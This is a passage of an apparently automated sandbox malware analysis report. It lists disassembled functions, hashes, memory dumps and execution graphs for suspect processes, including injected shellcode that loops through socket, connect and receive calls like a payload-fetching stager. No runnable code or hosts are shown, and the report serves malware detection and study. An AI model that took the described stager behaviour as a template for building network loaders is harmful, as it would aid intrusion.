                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memset$memmove
                                                              • String ID:
                                                              • API String ID: 3527438329-0
                                                              • Opcode ID: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction ID: dba297aa8fb042b18ff0822facc25e4acf5e394d44c3b4579297ae20e1131b5c
                                                              • Opcode Fuzzy Hash: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction Fuzzy Hash: E231007271064081FB16DA2BE4507E96612E38DBD0F848126EB1A83BAACA7EC502C740
                                                              Function 00000001400130CB Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $header crc mismatch
                                                              • API String ID: 0-4092041874
                                                              • Opcode ID: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction ID: f6894c87bdfd3a48e6411c52319aba3e102a5ca19e93322268f312efd41433f4
                                                              • Opcode Fuzzy Hash: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction Fuzzy Hash: 41A18FB26003508BFB269E1AC48C7AE3BE6F7587C8F064558EB964B3A4D776C954C780
                                                              Function 0000000140007A50 Relevance: 6.2, APIs: 4, Instructions: 163memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heapwcsncpy$AllocFree
                                                              • String ID:
                                                              • API String ID: 1479455602-0
                                                              • Opcode ID: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction ID: 28fd82db213d89e843f0df720333d3fbeca218ccf85cb71e10007619eb34b75b
                                                              • Opcode Fuzzy Hash: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction Fuzzy Hash: BF51A0B2B0068486EA66DF26A404BEA67E1F789BD4F588125EF4D477E5EB3CC542C300
                                                              Function 00000001400136B0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memmove
                                                              • String ID: $ $invalid stored block lengths
                                                              • API String ID: 2162964266-1718185709
                                                              • Opcode ID: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction ID: 754f218cd566fbce8dd602483dcb0b6cf2df6dd41c0e80f26ad42ee7a9f80f3a
                                                              • Opcode Fuzzy Hash: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction Fuzzy Hash: 3A417B766006508BE7268F27D5887AE3BA0F3087C8F155119FF8A4BBA4C776D8A1CB40
                                                              Function 000000014000C4F0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: EntryFunctionLookup$UnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3286588846-0
                                                              • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
                                                              • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
                                                              Function 00000001400085F0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CharLower
                                                              • String ID:
                                                              • API String ID: 1615517891-0
                                                              • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                                              • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                                              Function 00000001400171F0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction ID: 84a502ef329111f45b75735ee98b05bbb8abde518fb530cc481733cdeaf2302d
                                                              • Opcode Fuzzy Hash: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction Fuzzy Hash: 76216532608B8086D725CF56B44079AB7A5F7887D4F088325FF9917BA9DF3DC5529700
                                                              Function 000000014000DCA4 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                              • String ID:
                                                              • API String ID: 4012708801-0
                                                              • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                                              • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                                              Function 000000014001147C Relevance: 5.1, APIs: 4, Instructions: 122memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                                              • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                                              Function 000000014000D02C Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeapmemsetwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 1807340688-0
                                                              • Opcode ID: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction ID: 2291175711b854bc4f74fb4265d0f1bd771c1a5bff4f4550b8324bf1b1149364
                                                              • Opcode Fuzzy Hash: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction Fuzzy Hash: DA3129B1605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518351
                                                              Function 000000014000CCD8 Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 3901518246-0
                                                              • Opcode ID: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction ID: 7f7b652e9f7b58be947c1c734e7a82da3d99598ff0fb71c13e03353473737a2d
                                                              • Opcode Fuzzy Hash: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction Fuzzy Hash: 063142B2211B409BE702DF13EA807A937A4F78CBD0F448429EB4847B65DF79E4A6C740
                                                              Function 00000001400112A8 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                                              • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                                              Function 0000000140017120 Relevance: 5.0, APIs: 4, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction ID: 61c3440d716b3c64d08436ee48054615140ae5ecb8d8084460387f48d4e9dd56
                                                              • Opcode Fuzzy Hash: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction Fuzzy Hash: BB11C13260878082EB25CF26B41076AB7A4FB89BE4F140328EF9D57BE5DF39C0118704
                                                              Function 0000000140011668 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalFreeHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 1298188129-0
                                                              • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                                              • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                                              Function 000000014000CE30 Relevance: 5.0, APIs: 4, Instructions: 37memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                              • String ID:
                                                              • API String ID: 4254243056-0
                                                              • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                                              • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

                                                              Execution Graph

                                                              Execution Coverage:42.8%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:10
                                                              Total number of Limit Nodes:3
                                                              execution_graph 34 690000 37 690095 34->37 36 690006 36->36 38 6900aa 37->38 39 6900bc WSASocketA 38->39 40 6900d8 connect 39->40 41 6900f1 recv 40->41 43 6900e7 40->43 42 690139 closesocket 41->42 41->43 42->39 42->43 43->40 43->41 43->42 44 690157 43->44 44->36

                                                              Callgraph

                                                              • Executed
                                                              • Not Executed
                                                              • Opacity -> Relevance
                                                              • Disassembly available
                                                              callgraph 0 Function_00690000 1 Function_00690095 0->1

                                                              Executed Functions

                                                              Function 00690095 Relevance: 6.1, APIs: 4, Instructions: 81networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 690095-6900ba 3 6900bc-6900d7 WSASocketA 0->3 4 6900d8-6900e5 connect 3->4 5 6900f1-690101 recv 4->5 6 6900e7-6900ea 4->6 8 690139-690146 closesocket 5->8 9 690103-690117 5->9 6->4 7 6900ec call 690158 6->7 7->5 8->3 10 69014c 8->10 13 690118-690127 9->13 10->7 15 690129-690132 13->15 16 690151-690155 13->16 15->8 16->13 17 690157 16->17
                                                              APIs
                                                              • WSASocketA.WS2_32(E0DF0FEA,00000002,00000001,00000000,00000000,00000000,00000000,61040002,17DDB993,0000000A,?,?,5F327377,00003233), ref: 006900D5
                                                              • connect.WS2_32(6174A599,?,?,00000010,?,?,5F327377,00003233), ref: 006900E1
                                                              • recv.WS2_32(5FC8D902,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 006900FC
                                                              • closesocket.WS2_32(614D6E75,?,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 0069013F
                                                              Memory Dump Source
                                                              • Source File: 0000001B.00000002.2895931053.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_27_2_690000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Socketclosesocketconnectrecv
                                                              • String ID:
                                                              • API String ID: 2083937939-0
                                                              • Opcode ID: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction ID: 327eec653f23560a16df2192c97ad8ff14f98007befe078a999dd95378402dd5
                                                              • Opcode Fuzzy Hash: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction Fuzzy Hash: A711C0B168029C3EF93022A29C47FBB291CCF42BA4F100025BB45FA5C1C8829C4481FA

                                                              Execution Graph

                                                              Execution Coverage:42.8%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:9
                                                              Total number of Limit Nodes:3
                                                              execution_graph 34 4b0000 37 4b0095 34->37 38 4b00aa 37->38 39 4b00bc WSASocketA 38->39 40 4b00d8 connect 39->40 41 4b00f1 recv 40->41 43 4b00e7 40->43 42 4b0139 closesocket 41->42 41->43 42->39 42->43 43->40 43->41 43->42 44 4b0006 43->44

                                                              Callgraph

                                                              • Executed
                                                              • Not Executed
                                                              • Opacity -> Relevance
                                                              • Disassembly available
                                                              callgraph 0 Function_004B0000 1 Function_004B0095 0->1

                                                              Executed Functions

                                                              Function 004B0095 Relevance: 6.1, APIs: 4, Instructions: 81networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 4b0095-4b00ba 3 4b00bc-4b00d7 WSASocketA 0->3 4 4b00d8-4b00e5 connect 3->4 5 4b00f1-4b0101 recv 4->5 6 4b00e7-4b00ea 4->6 8 4b0139-4b0146 closesocket 5->8 9 4b0103-4b0117 5->9 6->4 7 4b00ec call 4b0158 6->7 7->5 8->3 10 4b014c 8->10 13 4b0118-4b0127 9->13 10->7 15 4b0129-4b0132 13->15 16 4b0151-4b0155 13->16 15->8 16->13 17 4b0157 16->17
                                                              APIs
                                                              • WSASocketA.WS2_32(E0DF0FEA,00000002,00000001,00000000,00000000,00000000,00000000,61040002,17DDB993,0000000A,?,?,5F327377,00003233), ref: 004B00D5
                                                              • connect.WS2_32(6174A599,?,?,00000010,?,?,5F327377,00003233), ref: 004B00E1
                                                              • recv.WS2_32(5FC8D902,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 004B00FC
                                                              • closesocket.WS2_32(614D6E75,?,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 004B013F
                                                              Memory Dump Source
                                                              • Source File: 0000001C.00000002.2895801436.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_28_2_4b0000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Socketclosesocketconnectrecv
                                                              • String ID:
                                                              • API String ID: 2083937939-0
                                                              • Opcode ID: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction ID: 4986a570a3823d31c4fb244b7cc399561d3bb85c5cc1dab5fb55dd75d18e226f
                                                              • Opcode Fuzzy Hash: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction Fuzzy Hash: 5F116DB16802987EF5302666AC47FFB691CCB42BA9F104426BB45EA1C1C9969C4581FE

                                                              Execution Graph

                                                              Execution Coverage:14.1%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:814
                                                              Total number of Limit Nodes:20
                                                              execution_graph 7543 140001dea 7544 140001ded 7543->7544 7555 140012360 7544->7555 7547 140012360 HeapFree 7548 140001e11 7547->7548 7549 140012360 HeapFree 7548->7549 7550 140001e23 7549->7550 7551 140012360 HeapFree 7550->7551 7552 140001e35 7551->7552 7553 140012360 HeapFree 7552->7553 7554 140001e47 7553->7554 7556 140012371 HeapFree 7555->7556 7557 140001dfc 7555->7557 7556->7557 7557->7547 8328 140011f69 8329 14001202d 8328->8329 8330 140011f89 8328->8330 8330->8329 8331 140011fc4 8330->8331 8334 140011d30 4 API calls 8330->8334 8332 140011feb 8331->8332 8333 140011fcf memmove 8331->8333 8332->8329 8335 140011ffb 8332->8335 8336 14001202f memmove 8332->8336 8333->8332 8334->8331 8335->8329 8337 140016538 5 API calls 8335->8337 8336->8329 8337->8335 7558 1400141eb 7559 1400141f6 7558->7559 7561 14001430c 7559->7561 7562 140014d80 7559->7562 7563 140014dad 7562->7563 7564 140014e0a memmove 7563->7564 7565 140014def memmove 7563->7565 7566 140014dc7 7563->7566 7564->7566 7567 140014e2b memmove 7564->7567 7565->7566 7566->7561 7567->7566 8189 1400016ed 8190 1400016f0 8189->8190 8191 140012360 HeapFree 8190->8191 8192 1400016ff 8191->8192 8193 140011ef4 2 API calls 8192->8193 8194 140001711 8193->8194 8195 140011ef4 2 API calls 8194->8195 8196 140001723 8195->8196 7889 140003c6e 7890 140003c71 7889->7890 7891 140012360 HeapFree 7890->7891 7892 140003c80 7891->7892 7893 140012360 HeapFree 7892->7893 7894 140003c92 7893->7894 7895 140012360 HeapFree 7894->7895 7896 140003ca7 7895->7896 7897 140012360 HeapFree 7896->7897 7898 140003cb9 7897->7898 7899 140017070 7900 1400170f8 7899->7900 7901 140017097 MultiByteToWideChar 7899->7901 7902 1400126d0 2 API calls 7900->7902 7901->7900 7904 1400170c9 7901->7904 7905 140017101 7902->7905 7906 1400126d0 2 API calls 7904->7906 7907 1400170d2 MultiByteToWideChar 7906->7907 7907->7905 7908 140012c70 TlsGetValue HeapFree HeapFree 7909 140010c70 7912 140010c98 7909->7912 7913 140010cd1 7912->7913 7914 140010ceb 7912->7914 7917 140010cd9 7912->7917 7918 1400171f0 7913->7918 7914->7917 7925 140016e50 7914->7925 7931 140010f00 7917->7931 7919 140017216 WideCharToMultiByte 7918->7919 7920 14001729d malloc 7918->7920 7919->7920 7923 14001725a malloc 7919->7923 7921 1400172aa 7920->7921 7921->7917 7923->7920 7924 14001726d WideCharToMultiByte 7923->7924 7924->7921 7926 140016e76 WideCharToMultiByte 7925->7926 7929 140016f02 7925->7929 7928 140016ebe malloc 7926->7928 7926->7929 7928->7929 7930 140016ecf WideCharToMultiByte 7928->7930 7929->7917 7930->7929 7932 140010f1e 7931->7932 7933 1400126d0 